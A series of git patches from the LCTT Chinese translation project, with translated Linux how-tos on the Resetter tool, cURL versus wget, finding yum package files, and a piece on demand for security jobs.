+* Linux Mint 17.3+(对 Mint 18.3 的支持即将推出)
+* Ubuntu 14.04+ (虽然我发现不支持 17.10)
+* Elementary OS 0.4+
+* Linux Deepin 15.4+
- * 删除用户及家目录
+说到这里,让我们安装和使用 Resetter。我将在 [Elementary OS Loki][5] 平台展示。
- * 创建默认备份用户
-
- * 允许您创建自定义备份用户
-
- * 自动安装MPIAs或选择MPIAs进行安装
-
- * 删除非默认用户
-
- * 查看所有相关依赖包
-
- * 删除协议软件包
-
-我将带领您完成安装和使用Resetter的过程。但是,我必须告诉你这个工具非常的测试版。即便如此,resetter绝对值得一试。实际上,我鼓励您测试应用程序并提交bug报告(您可以通过[GitHub][3]提交,或者直接发送给开发人员的电子邮件地址[gaining7@outlook.com][4])。
-It should also be noted that, at the moment, the only supported distributions are:
-还应注意的是,目前仅支持的衍生版有:
- * Debian 9.2(稳定)Gnome版本
- * Linux Mint 17.3 +(支持Mint 18.3即将推出)
- * Ubuntu 14.04+(虽然我发现不支持17.10)
- * Elementary OS 0.4+
- * Linux Deepin 15.4+
-
-说到这里,让我们安装和使用Resetter。我将在[Elementary OS Loki][5]平台展示
### 安装
-有几种方法可以安装Resetter。我选择的方法是通过gdebi辅助应用程序,为什么?因为它将获取安装所需的所有依赖项。首先,我们必须安装那个特定的工具。打开终端窗口并发出命令:
+有几种方法可以安装 Resetter。我选择的方法是通过 `gdebi` 辅助应用程序,为什么?因为它将获取安装所需的所有依赖项。首先,我们必须安装这个特定的工具。打开终端窗口并发出命令:
+
```
sudo apt install gdebi
```
-一旦安装完毕,请将浏览器指向[Resetter下载页面][6],并下载该软件的最新版本。一旦下载完毕,打开文件管理器,导航到下载的文件,然后单击(或双击,这取决于你如何配置你的桌面)在resetter_xxx - stable_all.deb文件(XXX是版本号)。gdebi应用程序将会打开(图1)。点击安装包按钮,输入你的sudo密码,接下来 Resetter 将开始安装。
-## [resetter_1.jpg][7]
+
+一旦安装完毕,请将浏览器指向 [Resetter 下载页面][6],并下载该软件的最新版本。一旦下载完毕,打开文件管理器,导航到下载的文件,然后单击(或双击,这取决于你如何配置你的桌面) `resetter_XXX-stable_all.deb` 文件(XXX 是版本号)。`gdebi` 应用程序将会打开(图 1)。点击安装包按钮,输入你的 `sudo` 密码,接下来 Resetter 将开始安装。
+
![gdebi][8]
-图1:利用gdebi安装Resetter
-[使用许可][9]
+*图 1:利用 gdebi 安装 Resetter*
当安装完成,准备接下来的操作。
+
### 使用 Resetter
-记住,在做这个之前,必须备份数据。别怪我没提醒你。从终端窗口发出命令```sudo resetter```。您将被提示输入sudo密码。一旦Resetter打开,它将自动检测您的发行版(图2)。
-## [resetter_2.jpg][10]
+**记住,在这之前,必须备份数据。别怪我没提醒你。**
+
+从终端窗口发出命令 `sudo resetter`。您将被提示输入 `sudo`密码。一旦 Resetter 打开,它将自动检测您的发行版(图 2)。
![Resetter][11]
-图2: Resetter 主窗口
-[使用许可][9]
+*图 2:Resetter 主窗口*
-我们将通过自动重置来测试 Resetter 的流程。从主窗口,点击Automatic Reset(自动复位)。这款应用将提供一个明确的警告,它将把你的操作系统(的实例,Elementary OS 0.4.1 Loki)重新设置为出厂默认状态(图3)。
-## [resetter_3.jpg][12]
+我们将通过自动重置来测试 Resetter 的流程。从主窗口,点击 Automatic Reset(自动复位)。这款应用将提供一个明确的警告,它将把你的操作系统(我的实例,Elementary OS 0.4.1 Loki)重新设置为出厂默认状态(图 3)。
![警告][13]
-图3:在继续之前,Resetter警告您。
-[用户许可][9]
+*图 3:在继续之前,Resetter 会警告您。*
-单击Yes,Resetter将显示它将删除的所有包(图4)。如果您没有问题,单击OK,重置将开始。
-## [resetter_4.jpg][14]
+
+单击“Yes”,Resetter 会显示它将删除的所有包(图 4)。如果您没有问题,单击 OK,重置将开始。
![移除软件包][15]
-图4:所有要删除的包,以便将 Elementary OS 重置为出厂默认值。
-[使用许可][9]
+*图 4:所有要删除的包,以便将 Elementary OS 重置为出厂默认值。*
-在重置过程中,应用程序将显示一个进度窗口(图5)。根据安装的数量,这个过程不应该花费太长时间。
-## [resetter_5.jpg][16]
+在重置过程中,应用程序将显示一个进度窗口(图 5)。根据安装的数量,这个过程不应该花费太长时间。
![进度][17]
-图5: Resetter 进度窗口
-[使用许可][9]
+*图 5:Resetter 进度窗口*
-当进程完成时,Resetter将显示一个新的用户名和密码,以便重新登录到新重置的发行版(图6)。
-## [resetter_6.jpg][18]
+当过程完成时,Resetter 将显示一个新的用户名和密码,以便重新登录到新重置的发行版(图 6)。
![新用户][19]
-图6:新用户及密码
-[使用许可][9]
+*图 6:新用户及密码*
+
+单击 OK,然后当提示时单击“Yes”以重新启动系统。当提示登录时,使用 Resetter 应用程序提供给您的新凭证。成功登录后,您需要重新创建您的原始用户。该用户的主目录仍然是完整的,所以您需要做的就是发出命令 `sudo useradd USERNAME` ( USERNAME 是用户名)。完成之后,发出命令 `sudo passwd USERNAME` (USERNAME 是用户名)。使用设置的用户/密码,您可以注销并以旧用户的身份登录(使用在重新设置操作系统之前相同的家目录)。
-单击OK,然后在提示单击Yes以重新启动系统。当提示登录时,使用 Resetter 应用程序提供给您的新凭证。成功登录后,您需要重新创建您的原始用户。该用户的主目录仍然是完整的,所以您需要做的就是发出命令```sudo useradd USERNAME (USERNAME 是用户名)```。完成之后,发出命令```sudo passwd USERNAME (USERNAME 是用户名)```。使用设置的用户/密码,您可以注销并以旧用户的身份登录(在重新设置操作系统之前使用相同的家目录)。
### 我的成果
-我必须承认,在将密码添加到我的老用户(并通过使用su命令对该用户进行更改)之后,我无法使用该用户登录到 Elementary OS 桌面。为了解决这个问题,我登录了Resetter-created 用户,移动了老用户的家目录,删除了老用户(使用命令``` sudo deluser jack```),并重新创建了老用户(使用命令```sudo useradd -m jack```)。
+我必须承认,在将密码添加到我的老用户(并通过使用 `su` 命令切换到该用户进行测试)之后,我无法使用该用户登录到 Elementary OS 桌面。为了解决这个问题,我登录了 Resetter 所创建的用户,移动了老用户的家目录,删除了老用户(使用命令 `sudo deluser jack`),并重新创建了老用户(使用命令 `sudo useradd -m jack`)。
-这样做之后,我检查了原始的家目录,只发现了用户的所有权从 jack.jack 变成了 1000.1000。利用命令 ```sudo chown -R jack.jack /home/jack```,就可以容易的修正这个问题。这非常关键?如果您使用Resetter并发现无法用您的老用户登录(在您重新创建用户并设置一个新密码之后),请确保更改用户的家目录的所有权限。
+这样做之后,我检查了原始的家目录,发现用户的所有权从 `jack.jack` 变成了 `1000.1000`。利用命令 `sudo chown -R jack.jack /home/jack`,就可以很容易地修正这个问题。教训是什么?如果您使用 Resetter 并发现无法用您的老用户登录(在您重新创建用户并设置新密码之后),请确保更改该用户家目录的所有权。
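+
+(把前面提到的恢复老用户的命令合在一起,大致如下;这只是一个补充示意,并非原文内容,用户名 jack 沿用上文的例子。)
+
+```
+sudo useradd jack                    # 重新创建老用户(家目录已存在,无需 -m)
+sudo passwd jack                     # 为其设置密码
+sudo chown -R jack:jack /home/jack   # 修正家目录的所有权
+```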
-在这个问题之外,Resetter在将 Elementary OS Loki 恢复到默认状态方面做了大量的工作。虽然 Resetter 处在测试中,但它是一个相当令人印象深刻的工具。试一试,看看你是否有和我一样出色的成绩。
+在这个问题之外,Resetter 在将 Elementary OS Loki 恢复到默认状态方面做了大量的工作。虽然 Resetter 处在测试中,但它是一个相当令人印象深刻的工具。试一试,看看你是否有和我一样出色的成绩。
-从Linux基金会和edX的免费[" Linux入门"][20]课程学习更多关于Linux的知识。
--------------------------------------------------------------------------------
via: https://www.linux.com/learn/intro-to-linux/2017/12/set-ubuntu-derivatives-back-default-resetter
作者:[Jack Wallen][a]
译者:[stevenzdg988](https://github.com/stevenzdg988)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 7951246949aefca138ada511192fc0877e96cf19 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Mon, 8 Jan 2018 18:46:59 +0800
Subject: [PATCH 174/371] Delete 20180102 cURL vs. wget- Their Differences,
Usage and Which One You Should Use.md
---
...ces, Usage and Which One You Should Use.md | 61 -------------------
1 file changed, 61 deletions(-)
delete mode 100644 sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
diff --git a/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md b/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
deleted file mode 100644
index 1ffeac62bc..0000000000
--- a/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
+++ /dev/null
@@ -1,61 +0,0 @@
-translating by CYLeft
-
-cURL vs. wget: Their Differences, Usage and Which One You Should Use
-======
-![](https://www.maketecheasier.com/assets/uploads/2017/12/wgc-feat.jpg)
-
-For downloading files directly from the Linux command line, there are two utilities that immediately come to mind: `wget` and `cURL`. They share a lot of features and can easily get many of the same tasks accomplished.
-
-Though they share similar features, they aren't exactly the same. These programs fit slightly different roles and use cases, and do have traits that make each better for certain situations.
-
-### cURL vs wget: Their Similarities
-
-Both wget and cURL can download things. At their core, that's what they both do. They can make requests of the Internet and pull back the requested item. That could be a file, picture, or even the raw HTML of a website.
-
-Both programs are also capable of making HTTP POST requests. This means they can send data to a website, like filling out a form.
-
-Since both are command line tools, they were also both designed to be scriptable. You can include both wget and cURL in your [Bash scripts][1] to automatically interact with online content and retrieve what you need.
-
-### wget Advantages
-
-![wget download][2]
-
-wget is simple and straightforward. It's meant for quick downloads, and it's excellent at it. wget is a single self-contained program. It doesn't require any extra libraries, and it's not meant to do anything beyond the scope of what it does.
-
-Because wget is so tailored for straight downloads, it also has the ability to download recursively. That allows you to download everything on a page or all of the files in an FTP directory at once.
-
-wget also has intelligent defaults. It specifies how to handle a lot of things that a normal browser would, like cookies and redirects, without the need to add any configuration. Lastly, wget works out of the box.
-
-### cURL Advantages
-
-![cURL Download][3]
-
-cURL is a multi-tool. Sure, it can download content from the Internet. It can do a lot more, too.
-
-cURL is powered by a library: libcurl. This means you can write entire programs based on cURL, allowing you to base graphical download pograms on libcurl and get access to all of its functionality.
-
-The wide range or protocols that cURL supports are probably the biggest selling point it has. cURL can access websites over HTTP and HTTPS and can handle FTP in both directions. It supports LDAP and even Samba shares. You can actually use cURL to send and retrieve email.
-
-cURL has some neat security features, too. cURL supports loads of SSL/TLS libraries. It also supports Internet access via proxies, including SOCKS. That means you can use cURL over Tor.
-
-cURL also supports gzip compression to send large amounts of data more easily.
-
-### Closing Thoughts
-So should you use cURL or wget? That really depends. If you want to download something quickly without needing to worry about flags, then you should go with wget. It's simple and just works. If you want to do something more complex, cURL should be your immediate choice.
-
-cURL allows you to do a lot more. You can think of cURL like a stripped-down command line web browser. It supports just about every protocol you can think of and can access and interact with nearly all online content. The only is that a browser renders the responses that it receives, and cURL doesn't.
-
---------------------------------------------------------------------------------
-
-via: https://www.maketecheasier.com/curl-vs-wget/
-
-作者:[Nick Congleton][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.maketecheasier.com/author/nickcongleton/
-[1]:https://www.maketecheasier.com/beginners-guide-scripting-linux/
-[2]:https://www.maketecheasier.com/assets/uploads/2017/12/wgc-wget.jpg (wget download)
-[3]:https://www.maketecheasier.com/assets/uploads/2017/12/wgc-curl.jpg (cURL Download)
From 35d04b915b6c82ba501e8ee3ae800f3e3b3208f1 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 18:47:40 +0800
Subject: [PATCH 175/371] PUB:20171229 Set Ubuntu Derivatives Back to Default
with Resetter.md
@stevenzdg988 https://linux.cn/article-9217-1.html
---
...171229 Set Ubuntu Derivatives Back to Default with Resetter.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md (100%)
diff --git a/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md b/published/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
similarity index 100%
rename from translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
rename to published/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
From 0b41933d389fb964d113afbba121c20d15267bee Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Mon, 8 Jan 2018 18:48:25 +0800
Subject: [PATCH 176/371] translated done cURL vs. wget
20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
---
...ces, Usage and Which One You Should Use.md | 60 +++++++++++++++++++
1 file changed, 60 insertions(+)
create mode 100644 translated/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
diff --git a/translated/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md b/translated/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
new file mode 100644
index 0000000000..d3f55b8f61
--- /dev/null
+++ b/translated/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
@@ -0,0 +1,60 @@
+cURL vs. wget:两者的区别、用法,以及你应该选用哪一个?
+======
+![](https://www.maketecheasier.com/assets/uploads/2017/12/wgc-feat.jpg)
+
+当想要直接通过 Linux 命令行下载文件时,马上就能想到两个工具:`wget` 和 `cURL`。它们有很多共同的特性,可以很轻易地完成一些相同的任务。
+
+虽然它们有一些相似的特性,但它们并不完全一样。这两个程序适用于不同的场合,在特定场合下,各自都有让自己更胜一筹的特点。
+
+### cURL vs wget: 相似之处
+
+wget 和 cURL 都可以下载内容,这是它们最核心的功能。它们都可以向互联网发送请求并取回被请求的内容。取回的内容可以是文件、图片,甚至是网站的原始 HTML。
+
+这两个程序都可以进行 HTTP POST 请求。这意味着它们都可以向网站发送数据,比如说填充表单什么的。
+
+由于两者都是命令行工具,它们在设计上也都便于编写脚本。你可以把 wget 和 cURL 都写进你的 [Bash 脚本][1],自动与在线内容交互,取回所需的内容(两者的对照示例见下)。
+
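+下面用一组补充示例(并非原文内容,URL 仅为示意)对照一下两者完成同样任务时的写法:
+
+```
+## 下载同一个文件 ##
+wget https://example.com/file.tar.gz
+curl -O https://example.com/file.tar.gz
+
+## 发送同样的 HTTP POST 请求 ##
+wget --post-data "user=foo&lang=zh" https://example.com/form
+curl -d "user=foo&lang=zh" https://example.com/form
+```
+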
+### wget 的优势
+
+![wget download][2]
+
+wget 简单直接,专为快速下载而设计,并且非常擅长这件事。wget 是一个独立、自包含的程序,无需任何额外的库,也不会去做超出自身职责范围的事情。
+
+正因为 wget 如此专注于直接下载,它还支持递归下载。这让你可以一次性下载某个页面上的所有内容,或者 FTP 目录中的所有文件(见下面的示例)。
+
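+一个递归下载的补充示例(并非原文内容,URL 和深度仅为示意):
+
+```
+## 递归下载 docs 目录,最大深度为 2,且不回溯到上层目录 ##
+wget -r -np -l 2 https://example.com/docs/
+```
+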
+wget 拥有明智的默认设置。它规定了很多普通浏览器会如何处理的事情,比如 cookies 和重定向,而无需任何额外配置。最后,wget 真正做到了开箱即用。
+
+### cURL 优势
+
+![cURL Download][3]
+
+cURL 是一个多功能工具。当然,它可以下载网络内容,但它能做的还远不止这些。
+
+cURL 由一个库提供支持:libcurl。这就意味着你可以基于 cURL 编写整个程序,也可以基于 libcurl 编写图形化的下载程序,并访问 cURL 的全部功能。
+
+cURL 广泛的协议支持可能是它最大的卖点。cURL 可以通过 HTTP 和 HTTPS 访问网站,并能处理双向的 FTP 传输。它支持 LDAP 协议,甚至支持 Samba 共享。实际上,你还可以用 cURL 收发邮件。
+
+cURL 也有一些不错的安全特性。cURL 支持多种 SSL/TLS 库,也支持通过代理访问互联网,包括 SOCKS 代理。这意味着,你可以通过 Tor 来使用 cURL。
+
+cURL 同样支持 gzip 压缩,以便更轻松地发送大量数据。
+
+### 思考总结
+
+那你应该使用 cURL 还是 wget?这得看实际用途。如果你只想快速下载,又不想操心各种参数选项,那你应该选择简单够用的 wget。如果你想做一些更复杂的事情,那么 cURL 应该是你的首选。
+
+cURL 能让你做更多的事情。你可以把 cURL 想象成一个精简的命令行网页浏览器。它支持几乎你能想到的所有协议,可以访问并与几乎所有在线内容交互。唯一的区别是,浏览器会渲染接收到的响应,而 cURL 不会。
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/curl-vs-wget/
+
+作者:[Nick Congleton][a]
+译者:[译者ID](https://github.com/CYLeft)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/nickcongleton/
+[1]:https://www.maketecheasier.com/beginners-guide-scripting-linux/
+[2]:https://www.maketecheasier.com/assets/uploads/2017/12/wgc-wget.jpg (wget download)
+[3]:https://www.maketecheasier.com/assets/uploads/2017/12/wgc-curl.jpg (cURL Download)
From 37b1920456247da451a6a3fb699068ce65bab528 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 19:03:45 +0800
Subject: [PATCH 177/371] PRF:20180105 yum find out path where is package
installed to on CentOS-RHEL.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@cyleung 翻译时要尽量忠实原文。
---
... is package installed to on CentOS-RHEL.md | 57 ++++++++++---------
1 file changed, 30 insertions(+), 27 deletions(-)
diff --git a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
index 770b2cbe05..82708ab2a7 100644
--- a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -1,35 +1,34 @@
-在 CentOS/RHEL 上查找 yum 安裝软件的位置
+在 CentOS/RHEL 上查找 yum 安装的软件的位置
======
-我已经在 CentOS/RHEL 上[安装 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到软件包安装的目录呢?
+**我已经在 CentOS/RHEL 上[安装了 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到 yum 软件包安装的目录呢?**
-[yum 命令][2] 是可交互的,开源的,基于 rpm 的 CentOS/RHEL 的软件包管理工具。它会帮助你自动地完成以下操作:
+[yum 命令][2] 是可交互的、基于 rpm 的 CentOS/RHEL 的开源软件包管理工具。它会帮助你自动地完成以下操作:
- 1. 操作系统内核更新
- 2. 软件包更新
- 3. 安装新的软件包
- 4. 删除旧的软件包
- 5. 查找已安装和可用的软件包
+1. 核心系统文件更新
+2. 软件包更新
+3. 安装新的软件包
+4. 删除旧的软件包
+5. 查找已安装和可用的软件包
-和 yum 相似的软件包管理工具有: [apt-get command][3] 和 [apt command][4]。
+和 `yum` 相似的软件包管理工具有: [apt-get 命令][3] 和 [apt 命令][4]。
### yum 安装软件包的位置
-我们以安装 htop 为例:
+出于演示的目的,我们以下列命令安装 `htop`:
```
# yum install htop
```
-
-使用以下命令列出 yum 安装 htop 的文件:
+要列出名为 htop 的 yum 软件包安装的文件,运行下列 `rpm` 命令:
```
# rpm -q {packageNameHere}
# rpm -ql htop
```
-输出例子:
+示例输出:
```
/usr/bin/htop
@@ -40,18 +39,17 @@
/usr/share/doc/htop-2.0.2/README
/usr/share/man/man1/htop.1.gz
/usr/share/pixmaps/htop.png
-
```
-### 如何使用 repoquery 命令查看 yum 安装的软件包的位置
+### 如何使用 repoquery 命令查看由 yum 软件包安装的文件位置
-首先使用 [yum 命令][2] 安装 yum-utils 软件包:
+首先使用 [yum 命令][2] 安装 yum-utils 软件包:
```
# yum install yum-utils
```
-例子输出:
+示例输出:
```
Resolving Dependencies
@@ -110,20 +108,25 @@ Complete!
### 如何列出通过 yum 安装的命令?
-使用 repoquery 命令:
+现在可以使用 `repoquery` 命令:
-`# repoquery --list htop`
+```
+# repoquery --list htop
+```
-或者
+或者:
-`# repoquery -l htop`
+```
+# repoquery -l htop
+```
-例子输出:
+示例输出:
[![yum where is package installed][5]][5]
-你也可以使用 type 命令或者 command 命令查找指定二进制文件的位置,例如 httpd 或者 htop :
+*使用 repoquery 命令确定 yum 包安装的路径*
+你也可以使用 `type` 命令或者 `command` 命令查找指定二进制文件的位置,例如 `httpd` 或者 `htop` :
```
$ type -a httpd
@@ -133,15 +136,15 @@ $ command -V htop
### 关于作者
-作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6], [Facebook][7], [Google+][8]。
+作者是 nixCraft 的创始人,是一名经验丰富的系统管理员,也是 Linux 操作系统/Unix shell 脚本编程的培训师。他曾与全球多个行业的客户合作,包括 IT、教育、国防和空间研究,以及非盈利机构。他的联系方式:[Twitter][6]、[Facebook][7]、[Google+][8]。
--------------------------------------------------------------------------------
via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
-作者:[][a]
-译者:[译者 ID](https://github.com/cyleung)
-校对:[校对者 ID](https://github.com/ 校对者 ID)
+作者:[cyberciti][a]
+译者:[cyleung](https://github.com/cyleung)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出
From 0f6ad9fd1bbb1632a7c4000b1bfd9cca20476c99 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 19:04:57 +0800
Subject: [PATCH 178/371] PUB: 20180105 yum find out path where is package
installed to on CentOS-RHEL.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@cyleung 恭喜你,完成了第一篇翻译(虽然这是第二篇啦),文章发布地址:
https://linux.cn/article-9218-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/cyleung
---
... find out path where is package installed to on CentOS-RHEL.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20180105 yum find out path where is package installed to on CentOS-RHEL.md (100%)
diff --git a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/published/20180105 yum find out path where is package installed to on CentOS-RHEL.md
similarity index 100%
rename from translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
rename to published/20180105 yum find out path where is package installed to on CentOS-RHEL.md
From 7cee12cb53dd39404a5ebed960769ab366fd6e51 Mon Sep 17 00:00:00 2001
From: Torival
Date: Mon, 8 Jan 2018 19:58:39 +0800
Subject: [PATCH 179/371] Update 20171005 python-hwinfo - Display Summary Of
Hardware Information In Linux.md
Translating by Torival
---
...hwinfo - Display Summary Of Hardware Information In Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
index f92c52f3cf..e066269efb 100644
--- a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
+++ b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
@@ -1,4 +1,4 @@
-python-hwinfo : Display Summary Of Hardware Information In Linux
+Translating by Torival python-hwinfo : Display Summary Of Hardware Information In Linux
======
Till the date, we have covered most of the utilities which discover Linux system hardware information & configuration but still there are plenty of commands available for the same purpose.
From ee119c4888a5c8a0a22975974b3dafe2b7d1cab9 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 22:14:42 +0800
Subject: [PATCH 180/371] PRF&PUB:20171115 Security Jobs Are Hot Get Trained
and Get Noticed.md
@geekpi
---
...obs Are Hot Get Trained and Get Noticed.md | 59 +++++++++++++++++++
...obs Are Hot Get Trained and Get Noticed.md | 58 ------------------
2 files changed, 59 insertions(+), 58 deletions(-)
create mode 100644 published/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
delete mode 100644 translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
diff --git a/published/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/published/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
new file mode 100644
index 0000000000..459d6f3f4f
--- /dev/null
+++ b/published/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
@@ -0,0 +1,59 @@
+安全专家的需求正在快速增长
+============================================================
+
+![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills")
+
+> 来自 Dice 和 Linux 基金会的“开源工作报告”发现,未来对具有安全经验的专业人员的需求很高。
+
+对安全专业人员的需求是真实的。在 [Dice.com][4] 多达 75,000 个职位中,有 15% 是安全职位。[福布斯][6] 称:“根据网络安全数据工具 [CyberSeek][5],在美国每年有 4 万个信息安全分析师的职位空缺,雇主正在努力填补其他 20 万个与网络安全相关的工作。”我们知道,安全专家的需求正在快速增长,但感兴趣的程度还较低。
+
+### 安全是要关注的领域
+
+根据我的经验,很少有大学生对安全工作感兴趣,所以很多人把安全视为商机。入门级技术专家对业务分析师或系统分析师感兴趣,因为他们认为,如果想学习和应用核心 IT 概念,就必须坚持分析师工作或者更接近产品开发的工作。事实并非如此。
+
+事实上,如果你有兴趣成为商业领导者,那么安全是要关注的领域 —— 作为一名安全专业人员,你必须端到端地了解业务,你必须看大局来给你的公司带来优势。
+
+### 无所畏惧
+
+分析师和安全工作并不完全相同。公司出于必要继续合并工程和安全工作。企业正在以前所未有的速度进行基础架构和代码的自动化部署,从而提高了安全作为所有技术专业人士日常生活的一部分的重要性。在我们的 [Linux 基金会的开源工作报告][7]中,42% 的招聘经理表示未来对有安全经验的专业人士的需求很大。
+
+在安全方面,从未有过比现在更激动人心的时刻。如果你随时掌握最新的技术新闻,就会发现大量的事情与安全相关 —— 数据泄露、系统故障和欺诈。安全团队在不断变化、快节奏的环境中工作。真正的挑战在于,在保持甚至改进最终用户体验的同时,积极主动地做好安全工作,发现并消除漏洞。
+
+### 增长即将来临
+
+与技术的其他方面一样,安全将继续随着云一起增长。企业越来越多地转向云计算,这使组织暴露出比过去更多的安全漏洞。随着云的成熟,安全变得越来越重要。
+
+法规也在不断完善 —— 个人身份信息(PII)的范围越来越广。许多公司都发现,他们必须投资于安全来保持合规、避免上头条。由于面临巨额罚款、声誉受损以及高管的职位安全问题,公司开始为安全工具和人员安排越来越多的预算。
+
+### 培训和支持
+
+即使你不选择一个专门的安全工作,你也一定会发现自己需要写安全的代码,如果你没有这个技能,你将开始一场艰苦的战斗。如果你的公司提供在工作中学习的话也是可以的,但我建议结合培训、指导和不断的实践。如果你不使用安全技能,你将很快在快速进化的恶意攻击的复杂性中失去它们。
+
+对于那些寻找安全工作的人来说,我的建议是找到组织中那些在工程、开发或者架构领域最为强大的人员 —— 与他们和其他团队进行交流,做好实际工作,并且确保在心里保持大局。成为你的组织中一个脱颖而出的人,一个可以写安全的代码,同时也可以考虑战略和整体基础设施健康状况的人。
+
+### 游戏最后
+
+越来越多的公司正在投资安全,并试图填补其技术团队的空缺职位。如果你对管理感兴趣,那么安全是值得关注的领域。执行层领导希望知道他们的公司正在按规则行事,他们的数据是安全的,并且免受破坏和损失。
+
+明智地实施、具有战略眼光的安全工作正受到关注。安全对高管和消费者都至关重要 —— 我鼓励任何对安全感兴趣的人参加培训并做出贡献。
+
+_现在[下载][2]完整的 2017 年开源工作报告_
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed
+
+作者:[BEN COLLEN][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/bencollen
+[1]:https://www.linux.com/licenses/category/used-permission
+[2]:http://bit.ly/2017OSSjobsreport
+[3]:https://www.linux.com/files/images/security-skillspng
+[4]:http://www.dice.com/
+[5]:http://cyberseek.org/index.html#about
+[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163
+[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/
diff --git a/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
deleted file mode 100644
index 5834271731..0000000000
--- a/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
+++ /dev/null
@@ -1,58 +0,0 @@
-安全工作热门:受到培训并获得注意
-============================================================
-
-![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills")
-来自 Dice 和 Linux 基金会的“开源工作报告”发现,未来对具有安全经验的专业人员的需求很高。[经许可使用][1]
-
-对安全专业人员的需求是真实的。在 [Dice.com][4] 中,超过 75,000 个职位中有 15% 是安全职位。[Forbes][6] 中称:“根据网络安全数据工具 [CyberSeek][5],在美国每年有 4 万个信息安全分析师的职位空缺,雇主正在努力填补其他 20 万个与网络安全相关的工作。”我们知道,安全专家的需求正在快速增长,但兴趣水平还很低。
-
-### 安全是要关注的领域
-
-根据我的经验,很少有大学生对安全工作感兴趣,所以很多人把安全视为利基。入门级技术专家对业务分析师或系统分析师感兴趣,因为他们认为,如果想学习和应用核心 IT 概念,就必须坚持分析师工作或者更接近产品开发的工作。事实并非如此。
-
